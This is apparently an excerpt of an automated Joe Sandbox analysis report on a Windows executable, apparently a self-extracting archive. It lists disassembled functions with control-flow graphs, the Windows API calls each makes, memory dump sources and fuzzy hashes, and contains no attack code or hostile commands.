                                                                                    control_flow_graph 2828 7ff7b8f21330-7ff7b8f213bc call 7ff7b8f20ef0 2831 7ff7b8f213e7-7ff7b8f21404 2828->2831 2832 7ff7b8f213be-7ff7b8f213e2 call 7ff7b8f21278 RaiseException 2828->2832 2834 7ff7b8f21419-7ff7b8f2141d 2831->2834 2835 7ff7b8f21406-7ff7b8f21417 2831->2835 2838 7ff7b8f2160b-7ff7b8f2162b 2832->2838 2837 7ff7b8f21420-7ff7b8f2142c 2834->2837 2835->2837 2839 7ff7b8f2142e-7ff7b8f21440 2837->2839 2840 7ff7b8f2144d-7ff7b8f21450 2837->2840 2852 7ff7b8f215dc-7ff7b8f215e6 2839->2852 2853 7ff7b8f21446 2839->2853 2841 7ff7b8f214f7-7ff7b8f214fe 2840->2841 2842 7ff7b8f21456-7ff7b8f21459 2840->2842 2843 7ff7b8f21500-7ff7b8f2150f 2841->2843 2844 7ff7b8f21512-7ff7b8f21515 2841->2844 2845 7ff7b8f2145b-7ff7b8f2146e 2842->2845 2846 7ff7b8f21470-7ff7b8f21485 LoadLibraryExA 2842->2846 2843->2844 2848 7ff7b8f215ba-7ff7b8f215d7 call 7ff7b8f20e04 2844->2848 2849 7ff7b8f2151b-7ff7b8f2151f 2844->2849 2845->2846 2851 7ff7b8f214dc-7ff7b8f214e5 2845->2851 2850 7ff7b8f21487-7ff7b8f2149a GetLastError 2846->2850 2846->2851 2848->2852 2857 7ff7b8f21550-7ff7b8f21563 GetProcAddress 2849->2857 2858 7ff7b8f21521-7ff7b8f21525 2849->2858 2859 7ff7b8f2149c-7ff7b8f214af 2850->2859 2860 7ff7b8f214b1-7ff7b8f214d7 call 7ff7b8f21278 RaiseException 2850->2860 2863 7ff7b8f214e7-7ff7b8f214ea FreeLibrary 2851->2863 2864 7ff7b8f214f0 2851->2864 2861 7ff7b8f215e8-7ff7b8f215f9 2852->2861 2862 7ff7b8f21603-7ff7b8f21608 call 7ff7b8f21278 2852->2862 2853->2840 2857->2848 2868 7ff7b8f21565-7ff7b8f21578 GetLastError 2857->2868 2858->2857 2865 7ff7b8f21527-7ff7b8f21532 2858->2865 2859->2851 2859->2860 2860->2838 2861->2862 2862->2838 2863->2864 2864->2841 2865->2857 2869 7ff7b8f21534-7ff7b8f2153b 2865->2869 2873 7ff7b8f2157a-7ff7b8f2158d 2868->2873 2874 7ff7b8f2158f-7ff7b8f215b6 call 7ff7b8f21278 RaiseException call 7ff7b8f20ef0 2868->2874 2869->2857 2876 7ff7b8f2153d-7ff7b8f21542 2869->2876 2873->2848 2873->2874 2874->2848 2876->2857 2878 7ff7b8f21544-7ff7b8f2154e 2876->2878 2878->2848 2878->2857
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                    • String ID: H
                                                                                    • API String ID: 948315288-2852464175
                                                                                    • Opcode ID: f4eb3733d8d59e353b2384fb2f2ad1e612cbd000d7ed42ebdaafdbb0fd1220b0
                                                                                    • Instruction ID: 30cef2be538c09163b3b42809627d9fd4870deb4c15a3ef6e4ac6fe372104c5e
                                                                                    • Opcode Fuzzy Hash: f4eb3733d8d59e353b2384fb2f2ad1e612cbd000d7ed42ebdaafdbb0fd1220b0
                                                                                    • Instruction Fuzzy Hash: C1915C32A14B518EEB40DF69D8406ACB3A1FB2A759F844535EF0D17758EF38E496C328
                                                                                    Function 00007FF7B8F1F520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2964 7ff7b8f1f520-7ff7b8f1f54b 2965 7ff7b8f1f54d 2964->2965 2966 7ff7b8f1f550-7ff7b8f1f58d SetEnvironmentVariableW call 7ff7b8f0c968 2964->2966 2965->2966 2969 7ff7b8f1f5da-7ff7b8f1f5e2 2966->2969 2970 7ff7b8f1f58f 2966->2970 2972 7ff7b8f1f5e4-7ff7b8f1f5fa 2969->2972 2973 7ff7b8f1f616-7ff7b8f1f631 call 7ff7b8f21d70 2969->2973 2971 7ff7b8f1f593-7ff7b8f1f59b 2970->2971 2974 7ff7b8f1f59d 2971->2974 2975 7ff7b8f1f5a0-7ff7b8f1f5ab call 7ff7b8f0cce8 2971->2975 2976 7ff7b8f1f5fc-7ff7b8f1f60f 2972->2976 2977 7ff7b8f1f611 call 7ff7b8f21c5c 2972->2977 2974->2975 2986 7ff7b8f1f5ba-7ff7b8f1f5bf 2975->2986 2987 7ff7b8f1f5ad-7ff7b8f1f5b8 2975->2987 2976->2977 2981 7ff7b8f1f632-7ff7b8f1f637 call 7ff7b8f26834 2976->2981 2977->2973 2988 7ff7b8f1f5c1 2986->2988 2989 7ff7b8f1f5c4-7ff7b8f1f5d9 SetEnvironmentVariableW 2986->2989 2987->2971 2988->2989 2989->2969
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 3540648995-3493335439
                                                                                    • Opcode ID: b11b83db7919d23c0ea9a675594a34a2207fd524d4d6241bfc028c77fcb1733c
                                                                                    • Instruction ID: fd555503f166ba452e53f497aa4bbd20103ff4d28a0772ad6b1a23f379beb948
                                                                                    • Opcode Fuzzy Hash: b11b83db7919d23c0ea9a675594a34a2207fd524d4d6241bfc028c77fcb1733c
                                                                                    • Instruction Fuzzy Hash: 9231B272E14A1288EB00EF6DD4401BDE371EB66B89F941232DF5D126ADDE38D482C358
                                                                                    Function 00007FF7B8F1A824 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                    • String ID: ]
                                                                                    • API String ID: 3561356813-3352871620
                                                                                    • Opcode ID: 1c66b544a6b9d08b2250c3e1d750f5c667527eb235c99ff42d281833c251e765
                                                                                    • Instruction ID: 709c1c1adc114d855c3e947eead3864e84e4c97de11388097672dac5265fa8e2
                                                                                    • Opcode Fuzzy Hash: 1c66b544a6b9d08b2250c3e1d750f5c667527eb235c99ff42d281833c251e765
                                                                                    • Instruction Fuzzy Hash: 89119A31B0960289FA14BB19A5141B9E391AFAABD5F940134DF1D07B8DEE3CE9078754
                                                                                    Function 00007FF7B8F02EBC Relevance: 7.7, APIs: 5, Instructions: 167filetimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 3013 7ff7b8f02ebc-7ff7b8f02f01 3014 7ff7b8f02f03-7ff7b8f02f09 3013->3014 3015 7ff7b8f02f0b 3013->3015 3014->3015 3016 7ff7b8f02f0e-7ff7b8f02f11 3014->3016 3015->3016 3017 7ff7b8f02f13-7ff7b8f02f19 3016->3017 3018 7ff7b8f02f1b 3016->3018 3017->3018 3019 7ff7b8f02f1e-7ff7b8f02f21 3017->3019 3018->3019 3020 7ff7b8f02f23-7ff7b8f02f29 3019->3020 3021 7ff7b8f02f2b 3019->3021 3020->3021 3022 7ff7b8f02f2e-7ff7b8f02f3c call 7ff7b8f02680 3020->3022 3021->3022 3025 7ff7b8f02f51-7ff7b8f02f53 3022->3025 3026 7ff7b8f02f3e-7ff7b8f02f41 3022->3026 3028 7ff7b8f02f56-7ff7b8f02f5e 3025->3028 3026->3025 3027 7ff7b8f02f43-7ff7b8f02f4f call 7ff7b8f03108 3026->3027 3027->3028 3030 7ff7b8f02f63-7ff7b8f02f92 CreateFileW 3028->3030 3031 7ff7b8f02f60 3028->3031 3033 7ff7b8f03058-7ff7b8f0305b 3030->3033 3034 7ff7b8f02f98-7ff7b8f02fc2 call 7ff7b8f05d18 3030->3034 3031->3030 3035 7ff7b8f0305d-7ff7b8f03065 call 7ff7b8f0e6a4 3033->3035 3036 7ff7b8f0306a-7ff7b8f0306d 3033->3036 3045 7ff7b8f02fc4-7ff7b8f02ff6 CreateFileW 3034->3045 3046 7ff7b8f02ffa-7ff7b8f03002 3034->3046 3035->3036 3039 7ff7b8f0306f-7ff7b8f03076 call 7ff7b8f0e6a4 3036->3039 3040 7ff7b8f0307b-7ff7b8f0307e 3036->3040 3039->3040 3043 7ff7b8f03080-7ff7b8f03088 call 7ff7b8f0e6a4 3040->3043 3044 7ff7b8f0308d-7ff7b8f030cb SetFileTime CloseHandle 3040->3044 3043->3044 3048 7ff7b8f030cd-7ff7b8f030d3 call 7ff7b8f03108 3044->3048 3049 7ff7b8f030d8-7ff7b8f030ff call 7ff7b8f21d70 3044->3049 3045->3046 3050 7ff7b8f03004-7ff7b8f0301a 3046->3050 3051 7ff7b8f03042-7ff7b8f03052 3046->3051 3048->3049 3053 7ff7b8f03035-7ff7b8f0303a call 7ff7b8f21c5c 3050->3053 3054 7ff7b8f0301c-7ff7b8f0302f 3050->3054 3051->3033 3051->3049 3053->3051 3054->3053 3057 7ff7b8f03100-7ff7b8f03107 call 7ff7b8f26834 3054->3057
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2398171386-0
                                                                                    • Opcode ID: 0a52db6dad1828742b9444eab5e4d03181f60c141bb1b27e52af4acc5450fb8b
                                                                                    • Instruction ID: 67d25d1069cce97e3f3978775ca6d23b035cddbf4ef8bb8283553f8d16a4c963
                                                                                    • Opcode Fuzzy Hash: 0a52db6dad1828742b9444eab5e4d03181f60c141bb1b27e52af4acc5450fb8b
                                                                                    • Instruction Fuzzy Hash: 2461E872F146424DFB11AFA9D4003BDE361AB6A7AAF800631DF2D5679CDE3890468358
                                                                                    Function 00007FF7B8F1F638 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                    • String ID:
                                                                                    • API String ID: 3621893840-0
                                                                                    • Opcode ID: e48ddcbfcec78d12b2777cb162a6414ceb777024a9d991a470d8970c0877b647
                                                                                    • Instruction ID: 67aef0c20577b5dbeb5c96e1df097976aca3c5910aa3a0ece07d1fbd2f9bedad
                                                                                    • Opcode Fuzzy Hash: e48ddcbfcec78d12b2777cb162a6414ceb777024a9d991a470d8970c0877b647
                                                                                    • Instruction Fuzzy Hash: 96F04F31B3854286F750BB39E459B76E212FFB5706FC41030EB4E418989E2CD64ACB24
                                                                                    Function 00007FF7B8F1A624 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1266772231-0
                                                                                    • Opcode ID: d85be0907e19c9ae1ef4e188021c33c33ae08c599b2c5c457deb97b3c147d199
                                                                                    • Instruction ID: dce109855e612368a1945bb64bb2a5741a44b3e49c7786eb7e525960c9bc5292
                                                                                    • Opcode Fuzzy Hash: d85be0907e19c9ae1ef4e188021c33c33ae08c599b2c5c457deb97b3c147d199
                                                                                    • Instruction Fuzzy Hash: 07F04435B3854286FB90BB28E854B76E351FFA1746FC41130E74E41858DF2CD606C714
                                                                                    Function 00007FF7B8F02090 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF7B8F07EEA,?,?,00000000,00007FF7B8F13189), ref: 00007FF7B8F020CF
                                                                                    • WriteFile.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF7B8F07EEA,?,?,00000000,00007FF7B8F13189), ref: 00007FF7B8F0211B
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000,?,2AAAAAAAAAAAAAAB,00007FF7B8F07EEA,?,?,00000000,00007FF7B8F13189), ref: 00007FF7B8F0214A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$Handle
                                                                                    • String ID:
                                                                                    • API String ID: 4209713984-0
                                                                                    • Opcode ID: d813405eec6993757af6c4f141a3e1c83603099f439c6563749cfaf5c33619f8
                                                                                    • Instruction ID: 18e0a6ead3e19b6e9077df5221d9ec07bb215d3ee32b60b0819f0ea2343c62cb
                                                                                    • Opcode Fuzzy Hash: d813405eec6993757af6c4f141a3e1c83603099f439c6563749cfaf5c33619f8
                                                                                    • Instruction Fuzzy Hash: 2851F932A186435AFE56AF29D444379E360FF66791F904131EB5D06A98DF3CE486C328
                                                                                    Function 00007FF7B8F1FC10 Relevance: 6.1, APIs: 4, Instructions: 125COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2912839123-0
                                                                                    • Opcode ID: 57e05c431fe7e90533a94e1a6ad3565455027bd3bc516acc0c2d0c03200ed5fa
                                                                                    • Instruction ID: bbf6e09c5cc60a6dbb84957fe4d9e1bee7b78eb9e59c9f456bc37db7de26ca79
                                                                                    • Opcode Fuzzy Hash: 57e05c431fe7e90533a94e1a6ad3565455027bd3bc516acc0c2d0c03200ed5fa
                                                                                    • Instruction Fuzzy Hash: 35519372F1464289FB00BB6CD4452BCE361AF56B95F900632DB2C167DEDE7CD5428358
                                                                                    Function 00007FF7B8F02A30 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2359106489-0
                                                                                    • Opcode ID: 334ad6de0e67d76d81ac35460cf85f06b55ec17d084e96c283adef0998ffb90e
                                                                                    • Instruction ID: caa60861e09a04deb84c3eb1dcd3d32e5a4d766d618ccbe0ebcaee4838cc7732
                                                                                    • Opcode Fuzzy Hash: 334ad6de0e67d76d81ac35460cf85f06b55ec17d084e96c283adef0998ffb90e
                                                                                    • Instruction Fuzzy Hash: 8831C672A1C6434DEA22AF29914427DE251FFAA791F904231EF6D8369DDF3CD4438228
                                                                                    Function 00007FF7B8F01710 Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 2244327787-0
                                                                                    • Opcode ID: 3c6fc8b0f138e048470a0679d010b9966860626a5f3f01854496960ae9183c48
                                                                                    • Instruction ID: c2feb0f3dd449178dfd3255ab77cbc9a1c165bf195a6bbaddcaa0be701244003
                                                                                    • Opcode Fuzzy Hash: 3c6fc8b0f138e048470a0679d010b9966860626a5f3f01854496960ae9183c48
                                                                                    • Instruction Fuzzy Hash: 5C21A931A0C6068DE720AF19E400139E7A4FB52B96FD44531DB6D0668EDF3CE4C78728
                                                                                    Function 00007FF7B8F0E2B0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F0E638: ResetEvent.KERNEL32 ref: 00007FF7B8F0E651
                                                                                      • Part of subcall function 00007FF7B8F0E638: ReleaseSemaphore.KERNEL32 ref: 00007FF7B8F0E667
                                                                                    • ReleaseSemaphore.KERNEL32 ref: 00007FF7B8F0E2DC
                                                                                    • CloseHandle.KERNELBASE ref: 00007FF7B8F0E2FB
                                                                                    • DeleteCriticalSection.KERNEL32 ref: 00007FF7B8F0E312
                                                                                    • CloseHandle.KERNEL32 ref: 00007FF7B8F0E31F
                                                                                      • Part of subcall function 00007FF7B8F0E3C4: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3CB
                                                                                      • Part of subcall function 00007FF7B8F0E3C4: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 502429940-0
                                                                                    • Opcode ID: 90b84fc582fb9ace1cc5f02649ca45b98255c4d1b8865a573d452fb2aaa2ba32
                                                                                    • Instruction ID: 0f802d8ddca97acf3b79a209221997f59394bfaef0cefd4ba8e6db306d98bb97
                                                                                    • Opcode Fuzzy Hash: 90b84fc582fb9ace1cc5f02649ca45b98255c4d1b8865a573d452fb2aaa2ba32
                                                                                    • Instruction Fuzzy Hash: 30018436A24E819AE608EF25E5842ACE721FB99791F400030DB6D03259CF38E4B6C754
                                                                                    Function 00007FF7B8F17E14 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$Release
                                                                                    • String ID:
                                                                                    • API String ID: 1035833867-0
                                                                                    • Opcode ID: 3e26f7bd55a2dbcaec47bef06121e7cff6cd3021b0943b6a9cfed8a52944454b
                                                                                    • Instruction ID: 29c40a2dcb89ff1e21f0b3f13fc432f316aeafd0f2816615e555dfe9a8b6718f
                                                                                    • Opcode Fuzzy Hash: 3e26f7bd55a2dbcaec47bef06121e7cff6cd3021b0943b6a9cfed8a52944454b
                                                                                    • Instruction Fuzzy Hash: 4AE09B70E0960686FF087F795814175D151BF5A703F844538CA1E4675CDD3C95574728
                                                                                    Function 00007FF7B8F0E40C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
